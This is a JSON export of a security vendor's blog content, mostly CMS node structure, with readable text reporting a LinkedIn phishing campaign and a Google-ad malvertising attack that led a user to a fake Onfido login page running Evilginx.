,"content":68240,"nodeType":178},{},[68241],{"data":68242,"marks":68243,"value":60535,"nodeType":173},{},[],{"data":68245,"content":68246,"nodeType":178},{},[68247],{"data":68248,"marks":68249,"value":60542,"nodeType":173},{},[],{"data":68251,"content":68252,"nodeType":231},{},[],{"data":68254,"content":68255,"nodeType":235},{},[68256],{"data":68257,"marks":68258,"value":60553,"nodeType":173},{},[68259],{"type":370},{"data":68261,"content":68262,"nodeType":178},{},[68263],{"data":68264,"marks":68265,"value":60560,"nodeType":173},{},[],{"data":68267,"content":68268,"nodeType":178},{},[68269],{"data":68270,"marks":68271,"value":60567,"nodeType":173},{},[],{"data":68273,"content":68274,"nodeType":178},{},[68275],{"data":68276,"marks":68277,"value":60574,"nodeType":173},{},[],{"data":68279,"content":68280,"nodeType":231},{},[],{"data":68282,"content":68283,"nodeType":235},{},[68284],{"data":68285,"marks":68286,"value":60585,"nodeType":173},{},[68287],{"type":370},{"data":68289,"content":68290,"nodeType":178},{},[68291],{"data":68292,"marks":68293,"value":60592,"nodeType":173},{},[],{"data":68295,"content":68296,"nodeType":178},{},[68297,68300,68307,68310,68317],{"data":68298,"marks":68299,"value":60599,"nodeType":173},{},[],{"data":68301,"content":68302,"nodeType":186},{"uri":60115},[68303],{"data":68304,"marks":68305,"value":27706,"nodeType":173},{},[68306],{"type":194},{"data":68308,"marks":68309,"value":60610,"nodeType":173},{},[],{"data":68311,"content":68312,"nodeType":186},{"uri":60613},[68313],{"data":68314,"marks":68315,"value":27729,"nodeType":173},{},[68316],{"type":194},{"data":68318,"marks":68319,"value":60622,"nodeType":173},{},[],{"data":68321,"content":68322,"nodeType":178},{},[68323,68326,68333],{"data":68324,"marks":68325,"value":60629,"nodeType":173},{},[],{"data":68327,"content":68328,"nodeType":186},{"uri":60632},[68329],{"data":68330,"marks":68331,"value":60638,"nodeType":173},{},[68332],{"type":194},{"data":68334,"marks":68335,"value":60642,"nodeType":173},{},[],{"data":68337,"content":68338,"nodeType":178},{},[68339],{"data":68340,"marks":68341,"value":60649,"nodeType":173},{},[],{"data":68343,"content":68344,"nodeType":231},{},[],{"data":68346,"content":68347,"nodeType":169},{},[68348],{"data":68349,"marks":68350,"value":40632,"nodeType":173},{},[68351],{"type":370},{"data":68353,"content":68354,"nodeType":178},{},[68355],{"data":68356,"marks":68357,"value":60666,"nodeType":173},{},[],{"data":68359,"content":68360,"nodeType":178},{},[68361],{"data":68362,"marks":68363,"value":27202,"nodeType":173},{},[],{"data":68365,"content":68366,"nodeType":178},{},[68367,68370,68377],{"data":68368,"marks":68369,"value":59468,"nodeType":173},{},[],{"data":68371,"content":68372,"nodeType":186},{"uri":60681},[68373],{"data":68374,"marks":68375,"value":1472,"nodeType":173},{},[68376],{"type":194},{"data":68378,"marks":68379,"value":1477,"nodeType":173},{},[],{"items":68381},[68382,68384],{"sys":68383,"name":505},{"id":504},{"sys":68385,"name":509},{"id":508},{"items":68387},[68388],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":68389},{"url":1496},{"__typename":1528,"sys":68391,"content":68392,"title":58422,"synopsis":58423,"hashTags":118,"publishedDate":58424,"slug":58425,"tagsCollection":68772,"authorsCollection":68778},{"id":57991},{"json":68393},{"nodeType":165,"data":68394,"content":68395},{},[68396,68412,68425,68430,68436,68442,68445,68452,68467,68473,68478,68484,68489,68495,68500,68506,68511,68517,68522,68525,68532,68548,68553,68560,68576,68583,68609,68615,68622,68638,68645,68661,68666,68669,68676,68692,68698,68703,68706,68713,68729,68735,68741,68746],{"nodeType":178,"data":68397,"content":68398},{},[68399,68402,68409],{"nodeType":173,"value":58000,"marks":68400,"data":68401},[],{},{"nodeType":186,"data":68403,"content":68404},{"uri":6820},[68405],{"nodeType":173,"value":8157,"marks":68406,"data":68408},[68407],{"type":194},{},{"nodeType":173,"value":197,"marks":68410,"data":68411},[],{},{"nodeType":178,"data":68413,"content":68414},{},[68415,68418,68422],{"nodeType":173,"value":58017,"marks":68416,"data":68417},[],{},{"nodeType":173,"value":58021,"marks":68419,"data":68421},[68420],{"type":370},{},{"nodeType":173,"value":58026,"marks":68423,"data":68424},[],{},{"nodeType":312,"data":68426,"content":68429},{"target":68427},{"sys":68428},{"id":58033,"type":317,"linkType":318},[],{"nodeType":178,"data":68431,"content":68432},{},[68433],{"nodeType":173,"value":58039,"marks":68434,"data":68435},[],{},{"nodeType":178,"data":68437,"content":68438},{},[68439],{"nodeType":173,"value":58046,"marks":68440,"data":68441},[],{},{"nodeType":231,"data":68443,"content":68444},{},[],{"nodeType":169,"data":68446,"content":68447},{},[68448],{"nodeType":173,"value":58056,"marks":68449,"data":68451},[68450],{"type":370},{},{"nodeType":178,"data":68453,"content":68454},{},[68455,68458,68464],{"nodeType":173,"value":58064,"marks":68456,"data":68457},[],{},{"nodeType":186,"data":68459,"content":68460},{"uri":58069},[68461],{"nodeType":173,"value":58072,"marks":68462,"data":68463},[],{},{"nodeType":173,"value":3107,"marks":68465,"data":68466},[],{},{"nodeType":178,"data":68468,"content":68469},{},[68470],{"nodeType":173,"value":58082,"marks":68471,"data":68472},[],{},{"nodeType":312,"data":68474,"content":68477},{"target":68475},{"sys":68476},{"id":58089,"type":317,"linkType":318},[],{"nodeType":178,"data":68479,"content":68480},{},[68481],{"nodeType":173,"value":58095,"marks":68482,"data":68483},[],{},{"nodeType":312,"data":68485,"content":68488},{"target":68486},{"sys":68487},{"id":58102,"type":317,"linkType":318},[],{"nodeType":178,"data":68490,"content":68491},{},[68492],{"nodeType":173,"value":58108,"marks":68493,"data":68494},[],{},{"nodeType":312,"data":68496,"content":68499},{"target":68497},{"sys":68498},{"id":58115,"type":317,"linkType":318},[],{"nodeType":178,"data":68501,"content":68502},{},[68503],{"nodeType":173,"value":58121,"marks":68504,"data":68505},[],{},{"nodeType":312,"data":68507,"content":68510},{"target":68508},{"sys":68509},{"id":58128,"type":317,"linkType":318},[],{"nodeType":178,"data":68512,"content":68513},{},[68514],{"nodeType":173,"value":58134,"marks":68515,"data":68516},[],{},{"nodeType":312,"data":68518,"content":68521},{"target":68519},{"sys":68520},{"id":58141,"type":317,"linkType":318},[],{"nodeType":231,"data":68523,"content":68524},{},[],{"nodeType":169,"data":68526,"content":68527},{},[68528],{"nodeType":173,"value":58150,"marks":68529,"data":68531},[68530],{"type":370},{},{"nodeType":178,"data":68533,"content":68534},{},[68535,68538,68545],{"nodeType":173,"value":58158,"marks":68536,"data":68537},[],{},{"nodeType":186,"data":68539,"content":68540},{"uri":6820},[68541],{"nodeType":173,"value":8157,"marks":68542,"data":68544},[68543],{"type":194},{},{"nodeType":173,"value":58169,"marks":68546,"data":68547},[],{},{"nodeType":312,"data":68549,"content":68552},{"target":68550},{"sys":68551},{"id":58176,"type":317,"linkType":318},[],{"nodeType":235,"data":68554,"content":68555},{},[68556],{"nodeType":173,"value":58182,"marks":68557,"data":68559},[68558],{"type":370},{},{"nodeType":178,"data":68561,"content":68562},{},[68563,68566,68573],{"nodeType":173,"value":58190,"marks":68564,"data":68565},[],{},{"nodeType":186,"data":68567,"content":68568},{"uri":58195},[68569],{"nodeType":173,"value":58198,"marks":68570,"data":68572},[68571],{"type":194},{},{"nodeType":173,"value":58203,"marks":68574,"data":68575},[],{},{"nodeType":235,"data":68577,"content":68578},{},[68579],{"nodeType":173,"value":58210,"marks":68580,"data":68582},[68581],{"type":370},{},{"nodeType":178,"data":68584,"content":68585},{},[68586,68589,68596,68599,68606],{"nodeType":173,"value":58218,"marks":68587,"data":68588},[],{},{"nodeType":186,"data":68590,"content":68591},{"uri":8419},[68592],{"nodeType":173,"value":58225,"marks":68593,"data":68595},[68594],{"type":194},{},{"nodeType":173,"value":58230,"marks":68597,"data":68598},[],{},{"nodeType":186,"data":68600,"content":68601},{"uri":58235},[68602],{"nodeType":173,"value":58238,"marks":68603,"data":68605},[68604],{"type":194},{},{"nodeType":173,"value":58243,"marks":68607,"data":68608},[],{},{"nodeType":178,"data":68610,"content":68611},{},[68612],{"nodeType":173,"value":58250,"marks":68613,"data":68614},[],{},{"nodeType":235,"data":68616,"content":68617},{},[68618],{"nodeType":173,"value":58257,"marks":68619,"data":68621},[68620],{"type":370},{},{"nodeType":178,"data":68623,"content":68624},{},[68625,68628,68635],{"nodeType":173,"value":50021,"marks":68626,"data":68627},[],{},{"nodeType":186,"data":68629,"content":68630},{"uri":50026},[68631],{"nodeType":173,"value":50029,"marks":68632,"data":68634},[68633],{"type":194},{},{"nodeType":173,"value":50034,"marks":68636,"data":68637},[],{},{"nodeType":235,"data":68639,"content":68640},{},[68641],{"nodeType":173,"value":58281,"marks":68642,"data":68644},[68643],{"type":370},{},{"nodeType":178,"data":68646,"content":68647},{},[68648,68651,68658],{"nodeType":173,"value":58289,"marks":68649,"data":68650},[],{},{"nodeType":186,"data":68652,"content":68653},{"uri":50125},[68654],{"nodeType":173,"value":58296,"marks":68655,"data":68657},[68656],{"type":194},{},{"nodeType":173,"value":58301,"marks":68659,"data":68660},[],{},{"nodeType":312,"data":68662,"content":68665},{"target":68663},{"sys":68664},{"id":58308,"type":317,"linkType":318},[],{"nodeType":231,"data":68667,"content":68668},{},[],{"nodeType":169,"data":68670,"content":68671},{},[68672],{"nodeType":173,"value":8967,"marks":68673,"data":68675},[68674],{"type":370},{},{"nodeType":178,"data":68677,"content":68678},{},[68679,68682,68689],{"nodeType":173,"value":58324,"marks":68680,"data":68681},[],{},{"nodeType":186,"data":68683,"content":68684},{"uri":1764},[68685],{"nodeType":173,"value":58331,"marks":68686,"data":68688},[68687],{"type":194},{},{"nodeType":173,"value":58336,"marks":68690,"data":68691},[],{},{"nodeType":178,"data":68693,"content":68694},{},[68695],{"nodeType":173,"value":58343,"marks":68696,"data":68697},[],{},{"nodeType":312,"data":68699,"content":68702},{"target":68700},{"sys":68701},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":68704,"content":68705},{},[],{"nodeType":169,"data":68707,"content":68708},{},[68709],{"nodeType":173,"value":8517,"marks":68710,"data":68712},[68711],{"type":370},{},{"nodeType":178,"data":68714,"content":68715},{},[68716,68719,68726],{"nodeType":173,"value":8538,"marks":68717,"data":68718},[],{},{"nodeType":186,"data":68720,"content":68721},{"uri":6820},[68722],{"nodeType":173,"value":8545,"marks":68723,"data":68725},[68724],{"type":194},{},{"nodeType":173,"value":8550,"marks":68727,"data":68728},[],{},{"nodeType":178,"data":68730,"content":68731},{},[68732],{"nodeType":173,"value":26673,"marks":68733,"data":68734},[],{},{"nodeType":178,"data":68736,"content":68737},{},[68738],{"nodeType":173,"value":58387,"marks":68739,"data":68740},[],{},{"nodeType":312,"data":68742,"content":68745},{"target":68743},{"sys":68744},{"id":58394,"type":317,"linkType":318},[],{"nodeType":178,"data":68747,"content":68748},{},[68749,68752,68759,68762,68769],{"nodeType":173,"value":1451,"marks":68750,"data":68751},[],{},{"nodeType":186,"data":68753,"content":68754},{"uri":1456},[68755],{"nodeType":173,"value":1459,"marks":68756,"data":68758},[68757],{"type":194},{},{"nodeType":173,"value":1464,"marks":68760,"data":68761},[],{},{"nodeType":186,"data":68763,"content":68764},{"uri":1469},[68765],{"nodeType":173,"value":1472,"marks":68766,"data":68768},[68767],{"type":194},{},{"nodeType":173,"value":1477,"marks":68770,"data":68771},[],{},{"items":68773},[68774,68776],{"sys":68775,"name":509},{"id":508},{"sys":68777,"name":505},{"id":504},{"items":68779},[68780],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":68781},{"url":1496},{"items":68783},[68784],{"fullName":26724,"firstName":26725,"jobTitle":26726,"profilePicture":68785},{"url":26728},"content:blog:what-the-expansion-of-nydfs-nycrr-part-500-means-for-mfa-compliance.json","blog/what-the-expansion-of-nydfs-nycrr-part-500-means-for-mfa-compliance.json","blog/what-the-expansion-of-nydfs-nycrr-part-500-means-for-mfa-compliance",{"_path":68790,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":68791,"ogImage":118,"summary":68793,"title":58422,"subtitle":118,"metaTitle":68804,"synopsis":58423,"hashTags":118,"publishedDate":58424,"slug":58425,"tagsCollection":68805,"relatedBlogPostsCollection":68811,"authorsCollection":70382,"content":70386,"_id":70863,"_type":5439,"_source":5440,"_file":70864,"_stem":70865,"_extension":5439},"/blog/new-phishing-campaign-identified-targeting-linkedin-users",{"id":57991,"publishedAt":68792},"2025-11-17T15:27:30.278Z",{"json":68794},{"data":68795,"content":68796,"nodeType":165},{},[68797],{"data":68798,"content":68799,"nodeType":178},{},[68800],{"data":68801,"marks":68802,"value":68803,"nodeType":173},{},[],"Attackers are increasingly sending phishing lures via non-email delivery channels like social media, instant messaging apps, and search engines. In this article, we’re diving into the latest sophisticated LinkedIn phishing campaign intercepted by Push. ","New LinkedIn phishing campaign identified by Push Security",{"items":68806},[68807,68809],{"sys":68808,"name":509},{"id":508},{"sys":68810,"name":505},{"id":504},{"items":68812},[68813,69292,69775],{"__typename":1528,"sys":68814,"content":68815,"title":46288,"synopsis":59481,"hashTags":118,"publishedDate":59482,"slug":46289,"tagsCollection":69282,"authorsCollection":69288},{"id":24168},{"json":68816},{"nodeType":165,"data":68817,"content":68818},{},[68819,68824,68830,68836,68842,68845,68852,68858,68874,68879,68885,68890,68896,68902,68907,68920,68925,68931,68936,68939,68946,68952,68959,68975,68981,68987,68994,69010,69017,69033,69040,69056,69061,69064,69071,69077,69116,69122,69128,69131,69138,69144,69180,69183,69190,69196,69237,69260,69266],{"nodeType":312,"data":68820,"content":68823},{"target":68821},{"sys":68822},{"id":58955,"type":317,"linkType":318},[],{"nodeType":178,"data":68825,"content":68826},{},[68827],{"nodeType":173,"value":58961,"marks":68828,"data":68829},[],{},{"nodeType":178,"data":68831,"content":68832},{},[68833],{"nodeType":173,"value":58968,"marks":68834,"data":68835},[],{},{"nodeType":178,"data":68837,"content":68838},{},[68839],{"nodeType":173,"value":58975,"marks":68840,"data":68841},[],{},{"nodeType":231,"data":68843,"content":68844},{},[],{"nodeType":169,"data":68846,"content":68847},{},[68848],{"nodeType":173,"value":24096,"marks":68849,"data":68851},[68850],{"type":370},{},{"nodeType":178,"data":68853,"content":68854},{},[68855],{"nodeType":173,"value":58992,"marks":68856,"data":68857},[],{},{"nodeType":178,"data":68859,"content":68860},{},[68861,68864,68871],{"nodeType":173,"value":58999,"marks":68862,"data":68863},[],{},{"nodeType":186,"data":68865,"content":68866},{"uri":59004},[68867],{"nodeType":173,"value":59007,"marks":68868,"data":68870},[68869],{"type":194},{},{"nodeType":173,"value":59012,"marks":68872,"data":68873},[],{},{"nodeType":312,"data":68875,"content":68878},{"target":68876},{"sys":68877},{"id":59019,"type":317,"linkType":318},[],{"nodeType":178,"data":68880,"content":68881},{},[68882],{"nodeType":173,"value":59025,"marks":68883,"data":68884},[],{},{"nodeType":312,"data":68886,"content":68889},{"target":68887},{"sys":68888},{"id":59032,"type":317,"linkType":318},[],{"nodeType":178,"data":68891,"content":68892},{},[68893],{"nodeType":173,"value":59038,"marks":68894,"data":68895},[],{},{"nodeType":178,"data":68897,"content":68898},{},[68899],{"nodeType":173,"value":59045,"marks":68900,"data":68901},[],{},{"nodeType":312,"data":68903,"content":68906},{"target":68904},{"sys":68905},{"id":59052,"type":317,"linkType":318},[],{"nodeType":178,"data":68908,"content":68909},{},[68910,68913,68917],{"nodeType":173,"value":59058,"marks":68911,"data":68912},[],{},{"nodeType":173,"value":59062,"marks":68914,"data":68916},[68915],{"type":370},{},{"nodeType":173,"value":59067,"marks":68918,"data":68919},[],{},{"nodeType":312,"data":68921,"content":68924},{"target":68922},{"sys":68923},{"id":59074,"type":317,"linkType":318},[],{"nodeType":178,"data":68926,"content":68927},{},[68928],{"nodeType":173,"value":59080,"marks":68929,"data":68930},[],{},{"nodeType":312,"data":68932,"content":68935},{"target":68933},{"sys":68934},{"id":59087,"type":317,"linkType":318},[],{"nodeType":231,"data":68937,"content":68938},{},[],{"nodeType":169,"data":68940,"content":68941},{},[68942],{"nodeType":173,"value":59096,"marks":68943,"data":68945},[68944],{"type":370},{},{"nodeType":178,"data":68947,"content":68948},{},[68949],{"nodeType":173,"value":59104,"marks":68950,"data":68951},[],{},{"nodeType":235,"data":68953,"content":68954},{},[68955],{"nodeType":173,"value":59111,"marks":68956,"data":68958},[68957],{"type":370},{},{"nodeType":178,"data":68960,"content":68961},{},[68962,68965,68972],{"nodeType":173,"value":59119,"marks":68963,"data":68964},[],{},{"nodeType":186,"data":68966,"content":68967},{"uri":58195},[68968],{"nodeType":173,"value":59126,"marks":68969,"data":68971},[68970],{"type":194},{},{"nodeType":173,"value":59131,"marks":68973,"data":68974},[],{},{"nodeType":178,"data":68976,"content":68977},{},[68978],{"nodeType":173,"value":59138,"marks":68979,"data":68980},[],{},{"nodeType":178,"data":68982,"content":68983},{},[68984],{"nodeType":173,"value":59145,"marks":68985,"data":68986},[],{},{"nodeType":235,"data":68988,"content":68989},{},[68990],{"nodeType":173,"value":59152,"marks":68991,"data":68993},[68992],{"type":370},{},{"nodeType":178,"data":68995,"content":68996},{},[68997,69000,69007],{"nodeType":173,"value":59160,"marks":68998,"data":68999},[],{},{"nodeType":186,"data":69001,"content":69002},{"uri":58235},[69003],{"nodeType":173,"value":59167,"marks":69004,"data":69006},[69005],{"type":194},{},{"nodeType":173,"value":59172,"marks":69008,"data":69009},[],{},{"nodeType":235,"data":69011,"content":69012},{},[69013],{"nodeType":173,"value":59179,"marks":69014,"data":69016},[69015],{"type":370},{},{"nodeType":178,"data":69018,"content":69019},{},[69020,69023,69030],{"nodeType":173,"value":59187,"marks":69021,"data":69022},[],{},{"nodeType":186,"data":69024,"content":69025},{"uri":50026},[69026],{"nodeType":173,"value":59194,"marks":69027,"data":69029},[69028],{"type":194},{},{"nodeType":173,"value":59199,"marks":69031,"data":69032},[],{},{"nodeType":235,"data":69034,"content":69035},{},[69036],{"nodeType":173,"value":59206,"marks":69037,"data":69039},[69038],{"type":370},{},{"nodeType":178,"data":69041,"content":69042},{},[69043,69046,69053],{"nodeType":173,"value":59214,"marks":69044,"data":69045},[],{},{"nodeType":186,"data":69047,"content":69048},{"uri":8419},[69049],{"nodeType":173,"value":59221,"marks":69050,"data":69052},[69051],{"type":194},{},{"nodeType":173,"value":59226,"marks":69054,"data":69055},[],{},{"nodeType":312,"data":69057,"content":69060},{"target":69058},{"sys":69059},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":69062,"content":69063},{},[],{"nodeType":169,"data":69065,"content":69066},{},[69067],{"nodeType":173,"value":59241,"marks":69068,"data":69070},[69069],{"type":370},{},{"nodeType":178,"data":69072,"content":69073},{},[69074],{"nodeType":173,"value":59249,"marks":69075,"data":69076},[],{},{"nodeType":250,"data":69078,"content":69079},{},[69080,69089,69098,69107],{"nodeType":254,"data":69081,"content":69082},{},[69083],{"nodeType":178,"data":69084,"content":69085},{},[69086],{"nodeType":173,"value":59262,"marks":69087,"data":69088},[],{},{"nodeType":254,"data":69090,"content":69091},{},[69092],{"nodeType":178,"data":69093,"content":69094},{},[69095],{"nodeType":173,"value":59272,"marks":69096,"data":69097},[],{},{"nodeType":254,"data":69099,"content":69100},{},[69101],{"nodeType":178,"data":69102,"content":69103},{},[69104],{"nodeType":173,"value":59282,"marks":69105,"data":69106},[],{},{"nodeType":254,"data":69108,"content":69109},{},[69110],{"nodeType":178,"data":69111,"content":69112},{},[69113],{"nodeType":173,"value":59292,"marks":69114,"data":69115},[],{},{"nodeType":178,"data":69117,"content":69118},{},[69119],{"nodeType":173,"value":59299,"marks":69120,"data":69121},[],{},{"nodeType":178,"data":69123,"content":69124},{},[69125],{"nodeType":173,"value":59306,"marks":69126,"data":69127},[],{},{"nodeType":231,"data":69129,"content":69130},{},[],{"nodeType":169,"data":69132,"content":69133},{},[69134],{"nodeType":173,"value":8967,"marks":69135,"data":69137},[69136],{"type":370},{},{"nodeType":178,"data":69139,"content":69140},{},[69141],{"nodeType":173,"value":59323,"marks":69142,"data":69143},[],{},{"nodeType":178,"data":69145,"content":69146},{},[69147,69150,69157,69160,69167,69170,69177],{"nodeType":173,"value":59330,"marks":69148,"data":69149},[],{},{"nodeType":186,"data":69151,"content":69152},{"uri":59335},[69153],{"nodeType":173,"value":59338,"marks":69154,"data":69156},[69155],{"type":194},{},{"nodeType":173,"value":2936,"marks":69158,"data":69159},[],{},{"nodeType":186,"data":69161,"content":69162},{"uri":59347},[69163],{"nodeType":173,"value":59350,"marks":69164,"data":69166},[69165],{"type":194},{},{"nodeType":173,"value":59355,"marks":69168,"data":69169},[],{},{"nodeType":186,"data":69171,"content":69172},{"uri":832},[69173],{"nodeType":173,"value":4519,"marks":69174,"data":69176},[69175],{"type":194},{},{"nodeType":173,"value":59366,"marks":69178,"data":69179},[],{},{"nodeType":231,"data":69181,"content":69182},{},[],{"nodeType":169,"data":69184,"content":69185},{},[69186],{"nodeType":173,"value":2824,"marks":69187,"data":69189},[69188],{"type":370},{},{"nodeType":178,"data":69191,"content":69192},{},[69193],{"nodeType":173,"value":59383,"marks":69194,"data":69195},[],{},{"nodeType":250,"data":69197,"content":69198},{},[69199,69218],{"nodeType":254,"data":69200,"content":69201},{},[69202],{"nodeType":178,"data":69203,"content":69204},{},[69205,69208,69215],{"nodeType":173,"value":37,"marks":69206,"data":69207},[],{},{"nodeType":186,"data":69209,"content":69210},{"uri":9120},[69211],{"nodeType":173,"value":59402,"marks":69212,"data":69214},[69213],{"type":194},{},{"nodeType":173,"value":37,"marks":69216,"data":69217},[],{},{"nodeType":254,"data":69219,"content":69220},{},[69221],{"nodeType":178,"data":69222,"content":69223},{},[69224,69227,69234],{"nodeType":173,"value":37,"marks":69225,"data":69226},[],{},{"nodeType":186,"data":69228,"content":69229},{"uri":59420},[69230],{"nodeType":173,"value":59423,"marks":69231,"data":69233},[69232],{"type":194},{},{"nodeType":173,"value":37,"marks":69235,"data":69236},[],{},{"nodeType":178,"data":69238,"content":69239},{},[69240,69243,69247,69250,69257],{"nodeType":173,"value":59434,"marks":69241,"data":69242},[],{},{"nodeType":173,"value":59438,"marks":69244,"data":69246},[69245],{"type":370},{},{"nodeType":173,"value":59443,"marks":69248,"data":69249},[],{},{"nodeType":186,"data":69251,"content":69252},{"uri":6820},[69253],{"nodeType":173,"value":8545,"marks":69254,"data":69256},[69255],{"type":194},{},{"nodeType":173,"value":59454,"marks":69258,"data":69259},[],{},{"nodeType":178,"data":69261,"content":69262},{},[69263],{"nodeType":173,"value":59461,"marks":69264,"data":69265},[],{},{"nodeType":178,"data":69267,"content":69268},{},[69269,69272,69279],{"nodeType":173,"value":59468,"marks":69270,"data":69271},[],{},{"nodeType":186,"data":69273,"content":69274},{"uri":473},[69275],{"nodeType":173,"value":1472,"marks":69276,"data":69278},[69277],{"type":194},{},{"nodeType":173,"value":1477,"marks":69280,"data":69281},[],{},{"items":69283},[69284,69286],{"sys":69285,"name":509},{"id":508},{"sys":69287,"name":505},{"id":504},{"items":69289},[69290],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":69291},{"url":1496},{"__typename":1528,"sys":69293,"content":69295,"title":69761,"synopsis":69762,"hashTags":118,"publishedDate":69763,"slug":69764,"tagsCollection":69765,"authorsCollection":69771},{"id":69294},"51p0V5Vr4I9rapUytBWX0R",{"json":69296},{"nodeType":165,"data":69297,"content":69298},{},[69299,69306,69313,69320,69325,69332,69338,69345,69352,69355,69363,69370,69377,69400,69407,69410,69418,69433,69439,69446,69452,69459,69466,69469,69477,69496,69502,69509,69515,69518,69526,69546,69552,69559,69565,69585,69591,69597,69600,69608,69615,69622,69628,69631,69639,69646,69653,69656,69664,69671,69678,69684,69691,69724,69730,69737,69744],{"nodeType":169,"data":69300,"content":69301},{},[69302],{"nodeType":173,"value":24096,"marks":69303,"data":69305},[69304],{"type":370},{},{"nodeType":178,"data":69307,"content":69308},{},[69309],{"nodeType":173,"value":69310,"marks":69311,"data":69312},"On April 11th our browser-based phishing detection controls were triggered for a user with the Push extension installed. ",[],{},{"nodeType":178,"data":69314,"content":69315},{},[69316],{"nodeType":173,"value":69317,"marks":69318,"data":69319},"The user had visited the url dashboard[.]onfido[.].us[.]com after entering a Google search for ‘onfido’, a site they had previously accessed for work and had an account on. A convincing looking Google ad duped the user into clicking the fake link.",[],{},{"nodeType":312,"data":69321,"content":69324},{"target":69322},{"sys":69323},{"id":63196,"type":317,"linkType":318},[],{"nodeType":178,"data":69326,"content":69327},{},[69328],{"nodeType":173,"value":69329,"marks":69330,"data":69331},"Although the page was not the official login page for Onfido, it appeared legitimate enough at first glance to trick the user. ",[],{},{"nodeType":312,"data":69333,"content":69337},{"target":69334},{"sys":69335},{"id":69336,"type":317,"linkType":318},"4Tp1RJ3eSx7r79wwm9d9DZ",[],{"nodeType":178,"data":69339,"content":69340},{},[69341],{"nodeType":173,"value":69342,"marks":69343,"data":69344},"After clicking the link, the user was blocked from interacting with the malicious page running Evilginx by Push. We then took action to identify other Onfido users within the Push customer base and notify them accordingly of the campaign. ",[],{},{"nodeType":178,"data":69346,"content":69347},{},[69348],{"nodeType":173,"value":69349,"marks":69350,"data":69351},"There are a few interesting elements worth exploring. Let’s dive in. ",[],{},{"nodeType":231,"data":69353,"content":69354},{},[],{"nodeType":169,"data":69356,"content":69357},{},[69358],{"nodeType":173,"value":69359,"marks":69360,"data":69362},"Why Onfido?",[69361],{"type":370},{},{"nodeType":178,"data":69364,"content":69365},{},[69366],{"nodeType":173,"value":69367,"marks":69368,"data":69369},"Onfido is an interesting choice. It’s not your typical phishing target, which points to an interesting trend we’ve observed where attackers are diversifying their phishing targets. ",[],{},{"nodeType":178,"data":69371,"content":69372},{},[69373],{"nodeType":173,"value":69374,"marks":69375,"data":69376},"There are two main reasons for this:",[],{},{"nodeType":250,"data":69378,"content":69379},{},[69380,69390],{"nodeType":254,"data":69381,"content":69382},{},[69383],{"nodeType":178,"data":69384,"content":69385},{},[69386],{"nodeType":173,"value":69387,"marks":69388,"data":69389},"People are becoming increasingly suspicious of phishing attacks targeting core apps such as Microsoft, Google, Okta, etc. and are much more likely to spot real vs fake pages. ",[],{},{"nodeType":254,"data":69391,"content":69392},{},[69393],{"nodeType":178,"data":69394,"content":69395},{},[69396],{"nodeType":173,"value":69397,"marks":69398,"data":69399},"Because highly targeted apps like IdPs and enterprise cloud platforms are becoming increasingly hardened from an identity perspective, attackers have a lower chance of success relative to accounts on the long tail of internet apps used by an organization — many of which simply cannot be securely configured in the same way (e.g. no passkey/WebAuthn support, limited admin controls to discover and remediate identity security gaps, etc.). ",[],{},{"nodeType":178,"data":69401,"content":69402},{},[69403],{"nodeType":173,"value":69404,"marks":69405,"data":69406},"Onfido is also an interesting example in that it definitely contains valuable data that attackers can take advantage of. As a digital identity solution, it presents a significant risk from both a personal and company perspective if compromised, with plenty of PII that can be leveraged to extort a victim — and clear bad press (and possible regulator scrutiny) if the data is leaked!",[],{},{"nodeType":231,"data":69408,"content":69409},{},[],{"nodeType":169,"data":69411,"content":69412},{},[69413],{"nodeType":173,"value":69414,"marks":69415,"data":69417},"Why Google ads?",[69416],{"type":370},{},{"nodeType":178,"data":69419,"content":69420},{},[69421,69425,69429],{"nodeType":173,"value":69422,"marks":69423,"data":69424},"The attack is a form of ",[],{},{"nodeType":173,"value":8046,"marks":69426,"data":69428},[69427],{"type":370},{},{"nodeType":173,"value":69430,"marks":69431,"data":69432}," where attackers distribute malicious links via ads — in this case, via Google. This is just one example of the many non-email phishing channels that attackers have at their disposal today. ",[],{},{"nodeType":312,"data":69434,"content":69438},{"target":69435},{"sys":69436},{"id":69437,"type":317,"linkType":318},"7kfeOKGXEWVL5RW5jFnQBo",[],{"nodeType":178,"data":69440,"content":69441},{},[69442],{"nodeType":173,"value":69443,"marks":69444,"data":69445},"The use of malvertising has a couple of notable advantages here. Namely, because Google ads do not use the same reputation-based checks as an email security provider does, the attacker can use freshly created domains to conduct the attack. Usually, attackers would aim to take over existing domains with a reputation already built up, or spend 6-12 months bedding in their domains so that they pass mail filters. ",[],{},{"nodeType":312,"data":69447,"content":69451},{"target":69448},{"sys":69449},{"id":69450,"type":317,"linkType":318},"499fj1Xark8Bj7iQjv9Vsm",[],{"nodeType":178,"data":69453,"content":69454},{},[69455],{"nodeType":173,"value":69456,"marks":69457,"data":69458},"But in this case, the domain was registered only shortly before being used. We detected it only a few hours after it had been registered — and it’s already been taken down since (no doubt to be replaced with the next one). This means it’s easy for attackers to spin up these malvertising campaigns at will, without any real forward planning. ",[],{},{"nodeType":178,"data":69460,"content":69461},{},[69462],{"nodeType":173,"value":69463,"marks":69464,"data":69465},"In fact, malvertising doesn’t require much effort on the attacker’s part whatsoever. As a watering hole, you put the link up and wait for the clicks to roll in. Unfortunately, many people Google search for sites that they frequently use rather than accessing via bookmark, opening them up to these kinds of malvertising attacks. ",[],{},{"nodeType":231,"data":69467,"content":69468},{},[],{"nodeType":235,"data":69470,"content":69471},{},[69472],{"nodeType":173,"value":69473,"marks":69474,"data":69476},"No frills ",[69475],{"type":370},{},{"nodeType":178,"data":69478,"content":69479},{},[69480,69484,69492],{"nodeType":173,"value":69481,"marks":69482,"data":69483},"Unlike many of the other campaigns using MFA-bypass phishing kits we’ve seen in the wild, the attacker put very little effort into obfuscating the malicious page. We’ve seen some using things like Cloudflare Turnstile, CAPTCHA, or even ",[],{},{"nodeType":186,"data":69485,"content":69486},{"uri":61655},[69487],{"nodeType":173,"value":69488,"marks":69489,"data":69491},"Consent Phishing for OIDC scopes ",[69490],{"type":194},{},{"nodeType":173,"value":69493,"marks":69494,"data":69495},"to break sandbox detections and prevent security tools from reaching the malicious content to analyze it. 